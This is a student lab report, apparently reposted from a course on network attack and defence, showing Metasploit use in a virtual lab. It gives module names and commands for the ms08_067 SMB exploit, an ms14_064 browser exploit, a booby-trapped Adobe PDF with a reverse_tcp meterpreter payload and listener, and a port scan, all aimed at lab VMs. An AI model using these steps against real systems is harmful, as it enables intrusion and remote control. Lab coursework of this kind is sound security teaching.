2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用

Posted 20175312-tgy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用相关的知识,希望对你有一定的参考价值。

2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用

一、实验目标与内容

1.实践目标

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

2.实践内容

(1)一个主动攻击实践,如ms08_067;
(2)一个针对浏览器的攻击,如ms11_050;
(3)一个针对客户端的攻击,如Adobe;
(4)成功应用任何一个辅助模块。

二、实践步骤

1、一个主动攻击实践

1-1、简介

ms08_067_netapi
攻击机:kali(192.168.137.128)
靶机:Windows Server 2003(192.168.137.148)

1-2、操作

启动msfconsole查找漏洞search ms08-067:
技术图片

use exploit/windows/smb/ms08_067_netapi选择该漏洞:
技术图片
选取payload并设置参数:
技术图片

输入exploit进行攻击
技术图片

2、一个针对浏览器的攻击

2-1、简介

ms14-064
攻击机:kali(192.168.137.128)
靶机:Windows XP(192.168.137.149)

2-2、操作

用search ms14-064查询一下针对该漏洞的攻击模块
技术图片

use exploit/windows/browser/ms14_064_ole_code_execution使用该模块:
用set payload windows/meterpreter/reverse_tcp设置payload
show options查看信息,并设置需要设置的参数。
技术图片

exploit攻击后会生成带有攻击性的URL,如图:
技术图片

在winxp上用ie浏览器打开:
技术图片

再回到kali 发现已经回连成功:
技术图片

3、一个针对客户端的攻击

3-1、简介

攻击机:kali(192.168.137.128)
靶机:Windows XP(192.168.137.149)

3-2、操作

msfconsole
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.128 //攻击机 IP
set LPORT 5312
set FILENAME zlx5312.pdf //设置生成的pdf文件名
技术图片

exploit //发起攻击
生成zlx5312.pdf,装有虚拟增强功能的虚拟机可以直接复制至靶机上
技术图片

控制台中输入back退出当前模块,输入以下命令进入监听模块:
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.186.128 //攻击机 IP
set LPORT 5313
exploit
靶机中打开zlx5313.pdf文件,
kali中发现回连成功:
技术图片

4、成功应用任何一个辅助模块

4-1、简介

攻击机:kali(192.168.137.128)
靶机:Windows XP(192.168.137.149)

4-2、操作

search portscan # 搜索端口相关的漏洞
技术图片

use auxiliary/scanner/portscan/ack # 使用漏洞
show options #显示设置
设置参数,并进行扫描:
技术图片

三、实验中遇到的问题

问题:输入exploit/run/其他操作后,无反应/运行失败。
(1)如下图,这是由于虚拟机所用系统版本造成的,把中文版换英文版后就可以进行了。
技术图片
(2)如下图,未知原因就是攻击不成功,多次重试后攻击成功。
技术图片
(3)如下图,设置参数进行扫描毫无反应,没有任何回馈,未知解决方案
技术图片

四、问题回答

(1)用自己的话解释什么是exploit,payload,encode.
exploit:利用系统、程序或服务的漏洞对靶机攻击的过程。
payload:有效载荷,是攻击方想要执行的代码
encode:对恶意代码进行伪装,使其不被靶机发现,从而达到攻击的目的。
(2)离实战还缺些什么技术或步骤?
一缺信息来源,这主要表现在信息收集渠道上,实战中靶机的各种信息需要我们自行获取,不可能像实验中这样,干脆是自己安装的。
二缺操作方式,连英文中文版本的差异都会造成某些漏洞攻击无法生效,更别说操作系统代代更新,我们会用的未必是靶机会被成功攻击的。

五、实验收获与感想

本次实验在流程上可以说非常简单,操作上没有太大难度。
实验中出现的问题,无论是否解决我都可以预料到是虚拟机/电脑的问题而不是操作的失误,之前实验中有时会遇到一些无法理解的知识点,本次实验却几乎没有遇到,这次实验可以说是一个实践的过程,按照课程内容完成即可。
我在此次实验中掌握metasploit的基本应用方式,理解了重点常用的三种攻击方式的思路,复习了相关课程内容,收益匪浅。

以上是关于2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章

20175312 陶光远 2019-2020-2 《网络对抗技术》Exp0 环境搭建-Kali Linux 的安装

2019-2020-1 20175312 20175333 实验四 外设驱动程序设计

20175312 2018-2019-2 《Java程序设计》结对编程练习_四则运算(第一周:阶段性总结)

2019-2020-1 20175312 20175321 20175333 实验二 固件程序设计

20175312 2018-2019-2 实验三 敏捷开发与XP实践 实验报告

石述思 朱骏 吴晓波 美丽知性的李银 时寒冰 石述思 周可 司马南 闫肖锋 张宇权 彭澎 樊小纯 李善民 马光远 王福重